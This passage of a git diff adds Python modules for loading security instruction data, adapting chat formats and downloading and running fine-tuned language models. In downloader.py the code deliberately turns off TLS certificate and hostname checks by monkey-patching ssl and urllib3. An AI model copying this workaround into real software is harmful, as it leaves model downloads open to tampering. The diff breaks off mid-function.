+                    self.logger.warning(f"跳过文件 {json_file.name}:不支持的数据格式")
+                    
+            except Exception as e:
+                self.logger.error(f"加载JSON文件 {json_file.name} 失败: {e}")
+                continue
+        
+        # 处理JSONL文件
+        for jsonl_file in jsonl_files:
+            try:
+                self.logger.info(f"正在加载JSONL文件: {jsonl_file.name}")
+                file_data = []
+                with open(jsonl_file, 'r', encoding='utf-8') as f:
+                    for line_num, line in enumerate(f, 1):
+                        line = line.strip()
+                        if line:  # 跳过空行
+                            try:
+                                json_obj = json.loads(line)
+                                file_data.append(json_obj)
+                            except json.JSONDecodeError as e:
+                                self.logger.warning(f"跳过 {jsonl_file.name} 第 {line_num} 行:JSON解析错误 - {e}")
+                                continue
+                
+                if file_data:
+                    all_data.extend(file_data)
+                    self.logger.info(f"从 {jsonl_file.name} 加载了 {len(file_data)} 条数据")
+                    self.loaded_files.append(f"{jsonl_file.name} ({len(file_data)}条)")
+                else:
+                    self.logger.warning(f"文件 {jsonl_file.name} 中没有有效数据")
+                    
+            except Exception as e:
+                self.logger.error(f"加载JSONL文件 {jsonl_file.name} 失败: {e}")
+                continue
+        
+        self.logger.info(f"总共加载了 {len(all_data)} 条训练数据")
+        if self.loaded_files:
+            self.logger.info(f"已加载的文件: {', '.join(self.loaded_files)}")
+        return all_data
+    
+    def load_training_data(self, data_file: Optional[str] = None) -> List[Dict[str, str]]:
+        """加载训练数据
+        
+        Args:
+            data_file: 指定文件名,如果为None则自动加载目录下所有JSON文件
+        """
+        processed_dir = self.config.DATA_DIR / "processed"
+        
+        # 确保目录存在
+        processed_dir.mkdir(parents=True, exist_ok=True)
+        
+        if data_file is None:
+            # 自动加载目录下所有JSON文件
+            self.logger.info("未指定数据文件,将自动加载目录下所有JSON文件")
+            data = self.load_all_json_files_from_directory(processed_dir)
+            
+            if not data:
+                # 如果没有找到任何文件,尝试加载默认文件
+                default_file = processed_dir / "training_data.json"
+                if default_file.exists():
+                    self.logger.info("未找到其他文件,尝试加载默认文件 training_data.json")
+                    with open(default_file, 'r', encoding='utf-8') as f:
+                        data = json.load(f)
+                else:
+                    raise FileNotFoundError(f"目录 {processed_dir} 中未找到任何训练数据文件")
+        else:
+            # 加载指定文件
+            data_path = processed_dir / data_file
+            
+            if not data_path.exists():
+                raise FileNotFoundError(f"训练数据文件不存在: {data_path}")
+            
+            with open(data_path, 'r', encoding='utf-8') as f:
+                data = json.load(f)
+            
+            self.logger.info(f"加载训练数据: {len(data)} 条")
+        
+        return data
+    
+    def create_dataset(self, data: List[Dict[str, str]], 
+                      tokenizer: PreTrainedTokenizer) -> SecurityDataset:
+        """创建数据集"""
+        dataset = SecurityDataset(
+            data=data,
+            tokenizer=tokenizer,
+            max_length=self.data_config.max_sequence_length
+        )
+        
+        self.logger.info(f"创建数据集: {len(dataset)} 个样本")
+        return dataset
+    
+    def split_data(self, data: List[Dict[str, str]], 
+                  train_ratio: float = 0.9) -> tuple[List[Dict[str, str]], List[Dict[str, str]]]:
+        """分割训练和验证数据"""
+        total_size = len(data)
+        train_size = int(total_size * train_ratio)
+        
+        train_data = data[:train_size]
+        val_data = data[train_size:]
+        
+        self.logger.info(f"数据分割: 训练集 {len(train_data)} 条,验证集 {len(val_data)} 条")
+        return train_data, val_data
+    
+    def prepare_datasets(self, tokenizer: PreTrainedTokenizer, 
+                       data_file: Optional[str] = None,
+                       train_ratio: float = 0.9) -> tuple[SecurityDataset, SecurityDataset]:
+        """准备训练和验证数据集"""
+        # 加载数据
+        data = self.load_training_data(data_file)
+        
+        # 分割数据
+        train_data, val_data = self.split_data(data, train_ratio)
+        
+        # 创建数据集
+        train_dataset = self.create_dataset(train_data, tokenizer)
+        val_dataset = self.create_dataset(val_data, tokenizer)
+        
+        return train_dataset, val_dataset
+    
+    def get_data_info(self, data_file: Optional[str] = None) -> Dict[str, Any]:
+        """获取数据信息"""
+        try:
+            data = self.load_training_data(data_file)
+            
+            # 计算统计信息
+            total_chars = 0
+            for item in data:
+                if isinstance(item, dict):
+                    if "text" in item:
+                        total_chars += len(item["text"])
+                    elif "instruction" in item and "output" in item:
+                        total_chars += len(item["instruction"]) + len(item.get("input", "")) + len(item["output"])
+                    else:
+                        total_chars += len(str(item))
+                else:
+                    total_chars += len(str(item))
+            
+            avg_length = total_chars / len(data) if data else 0
+            
+            return {
+                "total_samples": len(data),
+                "total_characters": total_chars,
+                "average_length": avg_length,
+                "max_sequence_length": self.data_config.max_sequence_length
+            }
+        except Exception as e:
+            self.logger.error(f"获取数据信息失败: {e}")
+            return {}

+ 168 - 0
src/data/processor.py

@@ -0,0 +1,168 @@
+# -*- coding: utf-8 -*-
+"""
+数据处理器模块
+
+负责数据的清洗、格式化和预处理。
+"""
+
+import json
+from typing import List, Dict, Any
+from pathlib import Path
+from tqdm import tqdm
+
+from ..config import Config, DataConfig
+from ..config.data_config import PromptTemplates
+from ..utils.logger import get_logger
+
+
+class DataProcessor:
+    """数据处理器"""
+    
+    def __init__(self, config: Config = None, data_config: DataConfig = None):
+        self.config = config or Config()
+        self.data_config = data_config or DataConfig()
+        self.logger = get_logger(self.__class__.__name__)
+        
+        # 确保处理后数据目录存在
+        self.processed_data_dir = self.config.DATA_DIR / "processed"
+        self.processed_data_dir.mkdir(parents=True, exist_ok=True)
+    
+    def clean_data(self, raw_data: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
+        """清洗数据"""
+        self.logger.info("开始清洗数据...")
+        
+        cleaned_data = []
+        
+        for item in tqdm(raw_data, desc="清洗数据"):
+            # 基本字段检查
+            if not self._is_valid_item(item):
+                continue
+            
+            # 长度过滤
+            if not self._check_length(item):
+                continue
+            
+            # 格式化数据
+            cleaned_item = self._format_item(item)
+            cleaned_data.append(cleaned_item)
+        
+        self.logger.info(f"数据清洗完成,保留 {len(cleaned_data)}/{len(raw_data)} 条数据")
+        return cleaned_data
+    
+    def format_for_training(self, data: List[Dict[str, Any]]) -> List[Dict[str, str]]:
+        """格式化数据用于训练"""
+        self.logger.info("格式化训练数据...")
+        
+        formatted_data = []
+        
+        for item in tqdm(data, desc="格式化数据"):
+            # 根据类别选择模板
+            category = item.get("category", "general")
+            template = PromptTemplates.get_template(category)
+            
+            # 构建训练文本
+            text = template.format_conversation(
+                instruction=item["instruction"],
+                input_text=item.get("input", ""),
+                output=item["output"]
+            )
+            
+            formatted_data.append({"text": text})
+        
+        self.logger.info(f"数据格式化完成,共 {len(formatted_data)} 条训练数据")
+        return formatted_data
+    
+    def save_processed_data(self, data: List[Dict[str, Any]], filename: str) -> Path:
+        """保存处理后的数据"""
+        filepath = self.processed_data_dir / filename
+        
+        with open(filepath, 'w', encoding='utf-8') as f:
+            json.dump(data, f, ensure_ascii=False, indent=2)
+        
+        self.logger.info(f"数据已保存到: {filepath}")
+        return filepath
+    
+    def load_processed_data(self, filename: str) -> List[Dict[str, Any]]:
+        """加载处理后的数据"""
+        filepath = self.processed_data_dir / filename
+        
+        if not filepath.exists():
+            raise FileNotFoundError(f"数据文件不存在: {filepath}")
+        
+        with open(filepath, 'r', encoding='utf-8') as f:
+            data = json.load(f)
+        
+        self.logger.info(f"从 {filepath} 加载了 {len(data)} 条数据")
+        return data
+    
+    def process_and_save(self, raw_data: List[Dict[str, Any]], 
+                        clean_filename: str = "cleaned_data.json",
+                        training_filename: str = "training_data.json") -> tuple[Path, Path]:
+        """处理并保存数据"""
+        # 清洗数据
+        cleaned_data = self.clean_data(raw_data)
+        clean_path = self.save_processed_data(cleaned_data, clean_filename)
+        
+        # 格式化训练数据
+        training_data = self.format_for_training(cleaned_data)
+        training_path = self.save_processed_data(training_data, training_filename)
+        
+        return clean_path, training_path
+    
+    def _is_valid_item(self, item: Dict[str, Any]) -> bool:
+        """检查数据项是否有效"""
+        required_fields = ["instruction", "output"]
+        
+        for field in required_fields:
+            if field not in item or not item[field]:
+                return False
+        
+        return True
+    
+    def _check_length(self, item: Dict[str, Any]) -> bool:
+        """检查数据长度"""
+        instruction_len = len(item["instruction"].strip())
+        output_len = len(item["output"].strip())
+        
+        if instruction_len < self.data_config.min_instruction_length:
+            return False
+        
+        if output_len < self.data_config.min_output_length:
+            return False
+        
+        return True
+    
+    def _format_item(self, item: Dict[str, Any]) -> Dict[str, Any]:
+        """格式化数据项"""
+        return {
+            "instruction": item["instruction"].strip(),
+            "input": item.get("input", "").strip(),
+            "output": item["output"].strip(),
+            "category": item.get("category", "general")
+        }
+    
+    def get_data_statistics(self, data: List[Dict[str, Any]]) -> Dict[str, Any]:
+        """获取数据统计信息"""
+        if not data:
+            return {"total": 0}
+        
+        # 按类别统计
+        category_counts = {}
+        total_instruction_length = 0
+        total_output_length = 0
+        
+        for item in data:
+            category = item.get("category", "unknown")
+            category_counts[category] = category_counts.get(category, 0) + 1
+            
+            total_instruction_length += len(item.get("instruction", ""))
+            total_output_length += len(item.get("output", ""))
+        
+        stats = {
+            "total": len(data),
+            "categories": category_counts,
+            "avg_instruction_length": total_instruction_length / len(data),
+            "avg_output_length": total_output_length / len(data)
+        }
+        
+        return stats

+ 16 - 0
src/model/__init__.py

@@ -0,0 +1,16 @@
+# -*- coding: utf-8 -*-
+"""
+模型管理模块
+
+负责模型的下载、加载、训练和推理。
+"""
+
+from .downloader import ModelDownloader
+from .trainer import SecurityModelTrainer
+from .inference import SecurityModelInference
+
+__all__ = [
+    "ModelDownloader",
+    "SecurityModelTrainer", 
+    "SecurityModelInference"
+]

BIN
src/model/__pycache__/__init__.cpython-310.pyc


BIN
src/model/__pycache__/adapters.cpython-310.pyc


BIN
src/model/__pycache__/downloader.cpython-310.pyc


BIN
src/model/__pycache__/inference.cpython-310.pyc


BIN
src/model/__pycache__/trainer.cpython-310.pyc


+ 221 - 0
src/model/adapters.py

@@ -0,0 +1,221 @@
+# -*- coding: utf-8 -*-
+"""
+模型适配器模块
+
+为不同模型提供统一的接口和特殊处理逻辑。
+"""
+
+from abc import ABC, abstractmethod
+from typing import List, Dict, Any, Optional, Tuple
+from transformers import AutoTokenizer, AutoModelForCausalLM
+import torch
+
+from ..config.model_configs import ModelConfig
+from ..utils.logger import get_logger
+
+
+class BaseModelAdapter(ABC):
+    """模型适配器基类"""
+    
+    def __init__(self, config: ModelConfig):
+        self.config = config
+        self.logger = get_logger(self.__class__.__name__)
+    
+    @abstractmethod
+    def format_chat_prompt(self, messages: List[Dict[str, str]]) -> str:
+        """格式化对话提示词"""
+        pass
+    
+    @abstractmethod
+    def setup_tokenizer(self, tokenizer: AutoTokenizer) -> AutoTokenizer:
+        """设置分词器特殊配置"""
+        pass
+    
+    @abstractmethod
+    def setup_model(self, model: AutoModelForCausalLM) -> AutoModelForCausalLM:
+        """设置模型特殊配置"""
+        pass
+    
+    def get_generation_config(self) -> Dict[str, Any]:
+        """获取生成配置"""
+        return self.config.generation_config.copy()
+    
+    def get_default_system_message(self) -> str:
+        """获取默认系统消息"""
+        return self.config.identity_prompt
+
+
+class QwenAdapter(BaseModelAdapter):
+    """Qwen模型适配器"""
+    
+    def format_chat_prompt(self, messages: List[Dict[str, str]]) -> str:
+        """使用Qwen的chat template格式化对话"""
+        # Qwen支持标准的chat template,直接返回None让tokenizer处理
+        return None
+    
+    def setup_tokenizer(self, tokenizer: AutoTokenizer) -> AutoTokenizer:
+        """设置Qwen分词器"""
+        # 设置特殊token
+        if tokenizer.pad_token is None:
+            tokenizer.pad_token = tokenizer.eos_token
+        
+        # 设置padding方向
+        tokenizer.padding_side = "right"
+        
+        return tokenizer
+    
+    def setup_model(self, model: AutoModelForCausalLM) -> AutoModelForCausalLM:
+        """设置Qwen模型"""
+        # Qwen模型通常不需要特殊设置
+        return model
+
+
+class ChatGLMAdapter(BaseModelAdapter):
+    """ChatGLM模型适配器"""
+    
+    def format_chat_prompt(self, messages: List[Dict[str, str]]) -> str:
+        """使用ChatGLM的对话格式"""
+        prompt = ""
+        
+        for message in messages:
+            role = message["role"]
+            content = message["content"]
+            
+            if role == "system":
+                prompt += f"[系统] {content}\n"
+            elif role == "user":
+                prompt += f"[用户] {content}\n"
+            elif role == "assistant":
+                prompt += f"[助手] {content}\n"
+        
+        prompt += "[助手] "
+        return prompt
+    
+    def setup_tokenizer(self, tokenizer: AutoTokenizer) -> AutoTokenizer:
+        """设置ChatGLM分词器"""
+        # ChatGLM有自己的特殊token设置
+        tokenizer.padding_side = "left"  # ChatGLM通常使用左填充
+        return tokenizer
+    
+    def setup_model(self, model: AutoModelForCausalLM) -> AutoModelForCausalLM:
+        """设置ChatGLM模型"""
+        # 启用ChatGLM的特殊模式
+        if hasattr(model, 'transformer'):
+            model.transformer.output_hidden_states = False
+        return model
+
+
+class BaichuanAdapter(BaseModelAdapter):
+    """Baichuan模型适配器"""
+    
+    def format_chat_prompt(self, messages: List[Dict[str, str]]) -> str:
+        """使用Baichuan的对话格式"""
+        prompt = ""
+        
+        for message in messages:
+            role = message["role"]
+            content = message["content"]
+            
+            if role == "system":
+                prompt += f"<reserved_102>{content}<reserved_103>"
+            elif role == "user":
+                prompt += f"<reserved_106>{content}<reserved_107>"
+            elif role == "assistant":
+                prompt += f"{content}"
+        
+        return prompt
+    
+    def setup_tokenizer(self, tokenizer: AutoTokenizer) -> AutoTokenizer:
+        """设置Baichuan分词器"""
+        tokenizer.padding_side = "right"
+        if tokenizer.pad_token is None:
+            tokenizer.pad_token = tokenizer.eos_token
+        return tokenizer
+    
+    def setup_model(self, model: AutoModelForCausalLM) -> AutoModelForCausalLM:
+        """设置Baichuan模型"""
+        return model
+
+
+class LlamaAdapter(BaseModelAdapter):
+    """Llama模型适配器"""
+    
+    def format_chat_prompt(self, messages: List[Dict[str, str]]) -> str:
+        """使用Llama的对话格式"""
+        # Llama2-Chat使用特殊的格式
+        prompt = ""
+        
+        system_message = None
+        conversation = []
+        
+        for message in messages:
+            if message["role"] == "system":
+                system_message = message["content"]
+            else:
+                conversation.append(message)
+        
+        # 构建Llama2-Chat格式
+        if system_message:
+            prompt += f"<s>[INST] <<SYS>>\n{system_message}\n<</SYS>>\n\n"
+        else:
+            prompt += "<s>[INST] "
+        
+        for i, message in enumerate(conversation):
+            if message["role"] == "user":
+                if i == 0 and system_message:
+                    prompt += f"{message['content']} [/INST]"
+                else:
+                    prompt += f"<s>[INST] {message['content']} [/INST]"
+            elif message["role"] == "assistant":
+                prompt += f" {message['content']} </s>"
+        
+        return prompt
+    
+    def setup_tokenizer(self, tokenizer: AutoTokenizer) -> AutoTokenizer:
+        """设置Llama分词器"""
+        tokenizer.padding_side = "right"
+        if tokenizer.pad_token is None:
+            tokenizer.pad_token = tokenizer.unk_token or "<unk>"
+        return tokenizer
+    
+    def setup_model(self, model: AutoModelForCausalLM) -> AutoModelForCausalLM:
+        """设置Llama模型"""
+        return model
+
+
+class ModelAdapterFactory:
+    """模型适配器工厂"""
+    
+    _adapters = {
+        "qwen2": QwenAdapter,
+        "chatglm": ChatGLMAdapter,
+        "baichuan": BaichuanAdapter,
+        "llama": LlamaAdapter,
+    }
+    
+    @classmethod
+    def create_adapter(cls, config: ModelConfig) -> BaseModelAdapter:
+        """创建模型适配器"""
+        architecture = config.architecture.lower()
+        
+        # 处理架构名称的变体
+        if architecture.startswith("qwen"):
+            architecture = "qwen2"
+        elif architecture.startswith("chatglm"):
+            architecture = "chatglm"
+        elif architecture.startswith("baichuan"):
+            architecture = "baichuan"
+        elif architecture.startswith("llama"):
+            architecture = "llama"
+        
+        if architecture not in cls._adapters:
+            # 如果没有专门的适配器,使用Qwen适配器作为默认
+            architecture = "qwen2"
+        
+        adapter_class = cls._adapters[architecture]
+        return adapter_class(config)
+    
+    @classmethod
+    def register_adapter(cls, architecture: str, adapter_class: type) -> None:
+        """注册自定义适配器"""
+        cls._adapters[architecture] = adapter_class

+ 281 - 0
src/model/downloader.py

@@ -0,0 +1,281 @@
+# -*- coding: utf-8 -*-
+"""
+模型下载器模块
+
+负责从ModelScope或HuggingFace下载模型。
+"""
+
+import os
+from pathlib import Path
+from typing import Optional
+
+from ..config import Config
+from ..utils.logger import get_logger
+
+
+class ModelDownloader:
+    """模型下载器"""
+    
+    def __init__(self, config: Config = None, model_key: str = None):
+        self.config = config or Config()
+        
+        # 设置当前模型
+        if model_key:
+            self.config.set_current_model(model_key)
+        
+        # 获取模型配置
+        self.model_config = self.config.get_current_model_config()
+        self.logger = get_logger(self.__class__.__name__)
+        
+        # 设置环境变量
+        self.config.setup_environment()
+    
+    def download_model(self, model_name: Optional[str] = None, 
+                      force_download: bool = False) -> Path:
+        """下载模型"""
+        if model_name is None:
+            model_name = self.config.get_current_model_key()
+        
+        model_path = self.get_model_path(model_name)
+        
+        # 检查模型是否已存在
+        if self.check_model_exists(model_name) and not force_download:
+            self.logger.info(f"模型已存在: {model_path}")
+            return model_path
+        
+        self.logger.info(f"开始下载模型: {model_name}")
+        
+        try:
+            if self.config.USE_MODELSCOPE:
+                return self._download_from_modelscope(model_name, model_path)
+            else:
+                return self._download_from_huggingface(model_name, model_path)
+        except Exception as e:
+            self.logger.error(f"模型下载失败: {e}")
+            # 如果ModelScope失败,尝试HuggingFace
+            if self.config.USE_MODELSCOPE:
+                self.logger.info("尝试从HuggingFace下载...")
+                return self._download_from_huggingface(model_name, model_path)
+            raise
+    
+    def _download_from_modelscope(self, model_name: str, model_path: Path) -> Path:
+        """从ModelScope下载模型"""
+        # 首先尝试git clone方式下载
+        try:
+            return self._download_from_modelscope_git(model_name, model_path)
+        except Exception as git_error:
+            self.logger.warning(f"Git下载失败: {git_error},尝试SDK方式")
+            
+        # 如果git方式失败,回退到SDK方式
+        try:
+            return self._download_from_modelscope_sdk(model_name, model_path)
+        except Exception as sdk_error:
+            self.logger.error(f"SDK下载也失败: {sdk_error}")
+            raise
+    
+    def _download_from_modelscope_git(self, model_name: str, model_path: Path) -> Path:
+        """使用git clone从ModelScope下载模型"""
+        import subprocess
+        import shutil
+        
+        # 获取ModelScope下载ID
+        download_id = self.config.get_model_id_for_download('modelscope', model_name)
+        
+        if not download_id:
+            # 回退到原有映射逻辑
+            modelscope_names = {
+                "Qwen/Qwen2-1.5B": "qwen/Qwen2-1.5B",
+                "Qwen/Qwen2-1.5B-Instruct": "qwen/Qwen2-1.5B-Instruct",
+                "Qwen/Qwen2.5-1.5B-Instruct": "qwen/Qwen2.5-1.5B-Instruct"
+            }
+            download_id = modelscope_names.get(model_name, model_name)
+        
+        ms_model_name = download_id
+        git_url = f"https://www.modelscope.cn/{ms_model_name}.git"
+        
+        self.logger.info(f"使用git clone从ModelScope下载: {git_url}")
+        
+        # 检查git是否可用
+        try:
+            subprocess.run(["git", "--version"], check=True, capture_output=True)
+        except (subprocess.CalledProcessError, FileNotFoundError):
+            raise Exception("Git未安装或不可用")
+        
+        # 确保目标目录存在
+        model_path.parent.mkdir(parents=True, exist_ok=True)
+        
+        # 如果目标目录已存在,先删除
+        if model_path.exists():
+            shutil.rmtree(model_path)
+        
+        # 执行git clone
+        try:
+            cmd = ["git", "clone", git_url, str(model_path)]
+            result = subprocess.run(
+                cmd, 
+                check=True, 
+                capture_output=True, 
+                text=True,
+                timeout=1800  # 30分钟超时
+            )
+            
+            self.logger.info(f"Git clone成功: {model_path}")
+            return model_path
+            
+        except subprocess.TimeoutExpired:
+            raise Exception("Git clone超时")
+        except subprocess.CalledProcessError as e:
+            raise Exception(f"Git clone失败: {e.stderr}")
+    
+    def _download_from_modelscope_sdk(self, model_name: str, model_path: Path) -> Path:
+        """使用SDK从ModelScope下载模型"""
+        try:
+            # 设置SSL配置以解决证书验证问题
+            import ssl
+            import urllib3
+            import requests
+            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+            
+            # 彻底禁用SSL验证
+            original_context = ssl._create_default_https_context
+            ssl._create_default_https_context = ssl._create_unverified_context
+            
+            # Monkey patch urllib3 to disable SSL verification
+            import urllib3.util.ssl_
+            original_ssl_wrap_socket = urllib3.util.ssl_.ssl_wrap_socket
+            
+            def patched_ssl_wrap_socket(*args, **kwargs):
+                kwargs['cert_reqs'] = ssl.CERT_NONE
+                kwargs['check_hostname'] = False
+                return original_ssl_wrap_socket(*args, **kwargs)
+            
+            urllib3.util.ssl_.ssl_wrap_socket = patched_ssl_wrap_socket
+            
+            try:
+                from modelscope import snapshot_download
+                
+                # 获取ModelScope下载ID
+                download_id = self.config.get_model_id_for_download('modelscope', model_name)
+                
+                if not download_id:
+                    # 回退到原有映射逻辑
+                    modelscope_names = {
+                        "Qwen/Qwen2-1.5B": "qwen/Qwen2-1.5B",
+                        "Qwen/Qwen2-1.5B-Instruct": "qwen/Qwen2-1.5B-Instruct",
+                        "Qwen/Qwen2.5-1.5B-Instruct": "qwen/Qwen2.5-1.5B-Instruct"
+                    }
+                    download_id = modelscope_names.get(model_name, model_name)
+                
+                ms_model_name = download_id
+                
+                self.logger.info(f"使用SDK从ModelScope下载: {ms_model_name}")
+                
+                downloaded_path = snapshot_download(
+                    model_id=ms_model_name,
+                    cache_dir=str(self.config.MODELS_DIR),
+                    local_dir=str(model_path)
+                )
+                
+                self.logger.info(f"SDK下载完成: {downloaded_path}")
+                return Path(downloaded_path)
+                
+            finally:
+                # 恢复原始函数
+                ssl._create_default_https_context = original_context
+                urllib3.util.ssl_.ssl_wrap_socket = original_ssl_wrap_socket
+            
+        except ImportError:
+            self.logger.error("ModelScope未安装,请安装: pip install modelscope")
+            raise
+    
+    def _download_from_huggingface(self, model_name: str, model_path: Path) -> Path:
+        """从HuggingFace下载模型"""
+        try:
+            from transformers import AutoTokenizer, AutoModelForCausalLM
+            
+            self.logger.info(f"从HuggingFace下载: {model_name}")
+            
+            # 下载分词器
+            tokenizer = AutoTokenizer.from_pretrained(
+                model_name,
+                cache_dir=str(self.config.CACHE_DIR),
+                trust_remote_code=True
+            )
+            tokenizer.save_pretrained(str(model_path))
+            
+            # 下载模型
+            model = AutoModelForCausalLM.from_pretrained(
+                model_name,
+                cache_dir=str(self.config.CACHE_DIR),
+                trust_remote_code=True
+            )
+            model.save_pretrained(str(model_path))
+
+            self.logger.info(f"模型下载完成: {model_path}")
+            return model_path
+            
+        except Exception as e:
+            self.logger.error(f"HuggingFace下载失败: {e}")
+            raise
+    
+    def check_model_exists(self, model_name: Optional[str] = None) -> bool:
+        """检查模型是否存在"""
+        if model_name is None:
+            model_name = self.config.get_current_model_key()
+        
+        model_path = self.get_model_path(model_name)
+        
+        # 检查关键文件是否存在
+        required_files = ["config.json", "tokenizer.json"]
+        
+        if not model_path.exists():
+            return False
+        
+        for file_name in required_files:
+            if not (model_path / file_name).exists():
+                return False
+        
+        return True
+    
+    def get_model_path(self, model_name: Optional[str] = None) -> Path:
+        """获取模型路径"""
+        if model_name is None:
+            model_name = self.model_config.name
+        
+        # 尝试使用配置中的路径方法
+        if hasattr(self.config, 'get_model_path'):
+            return Path(self.config.get_model_path(model_name))
+        
+        # 优先检查原始名称(去掉组织前缀)
+        simple_name = model_name.split("/")[-1] if "/" in model_name else model_name
+        simple_path = self.config.MODELS_DIR / simple_name
+        
+        # 如果简单名称的目录存在,使用它
+        if simple_path.exists():
+            return simple_path
+        
+        # 否则使用下划线替换的名称
+        return self.config.MODELS_DIR / model_name.replace("/", "_")
+    
+    def get_model_info(self, model_name: Optional[str] = None) -> dict:
+        """获取模型信息"""
+        model_path = self.get_model_path(model_name)
+        
+        if not self.check_model_exists(model_name):
+            return {"exists": False, "path": str(model_path)}
+        
+        # 计算模型大小
+        total_size = 0
+        file_count = 0
+        
+        for file_path in model_path.rglob("*"):
+            if file_path.is_file():
+                total_size += file_path.stat().st_size
+                file_count += 1
+        
+        return {
+            "exists": True,
+            "path": str(model_path),
+            "size_mb": total_size / (1024 * 1024),
+            "file_count": file_count
+        }

+ 351 - 0
src/model/inference.py

@@ -0,0 +1,351 @@
+# -*- coding: utf-8 -*-
+"""
+模型推理模块
+
+负责模型的推理和对话。
+"""
+
+import torch
+from pathlib import Path
+from typing import Optional, List, Dict, Any
+from transformers import AutoTokenizer, AutoModelForCausalLM
+from peft import PeftModel
+
+from ..config import Config
+from ..config.model_configs import ModelRegistry
+from ..utils.logger import get_logger
+from .adapters import ModelAdapterFactory
+
+
+class SecurityModelInference:
+    """网络安全模型推理器"""
+    
+    def __init__(self, config: Config = None, model_key: Optional[str] = None):
+        self.config = config or Config()
+        self.logger = get_logger(self.__class__.__name__)
+        
+        # 设置模型
+        if model_key:
+            self.config.set_current_model(model_key)
+        
+        self.model_config = self.config.get_current_model_config()
+        self.adapter = ModelAdapterFactory.create_adapter(self.model_config)
+        
+        self.model = None
+        self.tokenizer = None
+        self.device = "cuda" if torch.cuda.is_available() else "cpu"
+        
+        self.logger.info(f"初始化推理器,使用模型: {self.model_config.name}")
+    
+    def load_model(self, model_path: Optional[str] = None, 
+                  base_model_path: Optional[str] = None,
+                  model_key: Optional[str] = None) -> None:
+        """加载模型"""
+        # 如果指定了新的模型键,更新配置
+        if model_key:
+            self.config.set_current_model(model_key)
+            self.model_config = self.config.get_current_model_config()
+            self.adapter = ModelAdapterFactory.create_adapter(self.model_config)
+            self.logger.info(f"切换到模型: {self.model_config.name}")
+        
+        if model_path is None:
+            # 优先使用训练后的模型
+            trained_model_path = self.config.OUTPUT_DIR / "final_model"
+            if trained_model_path.exists():
+                model_path = trained_model_path
+            else:
+                # 使用基础模型
+                model_path = self.config.get_model_path()
+        
+        model_path = Path(model_path)
+        
+        if not model_path.exists():
+            raise FileNotFoundError(f"模型路径不存在: {model_path}")
+        
+        self.logger.info(f"加载模型: {model_path} ({self.model_config.name})")
+        
+        # 检查是否是LoRA模型
+        is_lora_model = (model_path / "adapter_config.json").exists()
+        
+        if is_lora_model:
+            self._load_lora_model(model_path, base_model_path)
+        else:
+            self._load_full_model(model_path)
+        
+        self.logger.info("模型加载完成")
+    
+    def _load_full_model(self, model_path: Path) -> None:
+        """加载完整模型"""
+        # 加载分词器
+        self.tokenizer = AutoTokenizer.from_pretrained(
+            str(model_path),
+            trust_remote_code=True
+        )
+        
+        # 使用适配器设置分词器
+        self.tokenizer = self.adapter.setup_tokenizer(self.tokenizer)
+        
+        # 加载模型
+        self.model = AutoModelForCausalLM.from_pretrained(
+            str(model_path),
+            trust_remote_code=True,
+            torch_dtype=torch.float16,
+            device_map="auto" if self.device == "cuda" else None
+        )
+        
+        # 使用适配器设置模型
+        self.model = self.adapter.setup_model(self.model)
+    
+    def _load_lora_model(self, lora_path: Path, base_model_path: Optional[str] = None) -> None:
+        """加载LoRA模型"""
+        if base_model_path is None:
+            # 使用当前模型配置的路径
+            base_model_path = self.config.get_model_path()
+        
+        base_model_path = Path(base_model_path)
+        
+        if not base_model_path.exists():
+            raise FileNotFoundError(f"基础模型路径不存在: {base_model_path}")
+        
+        # 加载基础模型
+        self.tokenizer = AutoTokenizer.from_pretrained(
+            str(base_model_path),
+            trust_remote_code=True
+        )
+        
+        # 使用适配器设置分词器
+        self.tokenizer = self.adapter.setup_tokenizer(self.tokenizer)
+        
+        base_model = AutoModelForCausalLM.from_pretrained(
+            str(base_model_path),
+            trust_remote_code=True,
+            torch_dtype=torch.float16,
+            device_map="auto" if self.device == "cuda" else None
+        )
+        
+        # 使用适配器设置基础模型
+        base_model = self.adapter.setup_model(base_model)
+        
+        # 加载LoRA适配器
+        self.model = PeftModel.from_pretrained(base_model, str(lora_path))
+    
+    def generate_response(self, prompt: str, max_length: int = 512, 
+                         temperature: float = 0.7, top_p: float = 0.9) -> str:
+        """生成回复"""
+        if self.model is None or self.tokenizer is None:
+            raise ValueError("请先加载模型")
+        
+        # 编码输入
+        inputs = self.tokenizer(
+            prompt,
+            return_tensors="pt",
+            padding=True,
+            truncation=True,
+            max_length=512
+        )
+        
+        # 移动到设备
+        if self.device == "cuda":
+            inputs = {k: v.cuda() for k, v in inputs.items()}
+        
+        # 获取模型配置的生成参数
+        gen_config = self.adapter.get_generation_config()
+        
+        # 合并参数,优先使用传入的参数
+        generation_kwargs = {
+            'max_new_tokens': max_length,
+            'temperature': temperature,
+            'top_p': top_p,
+            'do_sample': True,
+            'pad_token_id': self.tokenizer.eos_token_id,
+            'eos_token_id': self.tokenizer.eos_token_id,
+            **gen_config  # 模型特定的配置
+        }
+        
+        # 覆盖传入的参数
+        generation_kwargs.update({
+            'max_new_tokens': max_length,
+            'temperature': temperature,
+            'top_p': top_p
+        })
+        
+        # 生成回复
+        with torch.no_grad():
+            outputs = self.model.generate(
+                **inputs,
+                **generation_kwargs
+            )
+        
+        # 解码输出
+        response = self.tokenizer.decode(
+            outputs[0][inputs['input_ids'].shape[1]:],
+            skip_special_tokens=True
+        )
+        
+        return response.strip()
+    
+    def chat(self, message: str, history: Optional[List[Dict[str, str]]] = None, 
+             system_message: Optional[str] = None) -> tuple[str, List[Dict[str, str]]]:
+        """对话接口"""
+        if history is None:
+            history = []
+        
+        # 构建消息列表
+        messages = []
+        
+        # 添加系统消息
+        if system_message:
+            messages.append({"role": "system", "content": system_message})
+        else:
+            # 使用模型配置的默认身份
+            messages.append({
+                "role": "system", 
+                "content": self.adapter.get_default_system_message()
+            })
+        
+        # 添加历史对话
+        for turn in history:
+            messages.append({"role": "user", "content": turn['user']})
+            messages.append({"role": "assistant", "content": turn['assistant']})
+        
+        # 添加当前消息
+        messages.append({"role": "user", "content": message})
+        
+        # 使用适配器格式化对话
+        adapter_prompt = self.adapter.format_chat_prompt(messages)
+        
+        if adapter_prompt is not None:
+            # 使用适配器的自定义格式
+            prompt = adapter_prompt
+        elif hasattr(self.tokenizer, 'apply_chat_template') and self.model_config.supports_chat_template:
+            # 使用tokenizer的chat template
+            prompt = self.tokenizer.apply_chat_template(
+                messages, 
+                tokenize=False, 
+                add_generation_prompt=True
+            )
+        else:
+            # 降级到简单文本拼接
+            prompt = ""
+            for msg in messages:
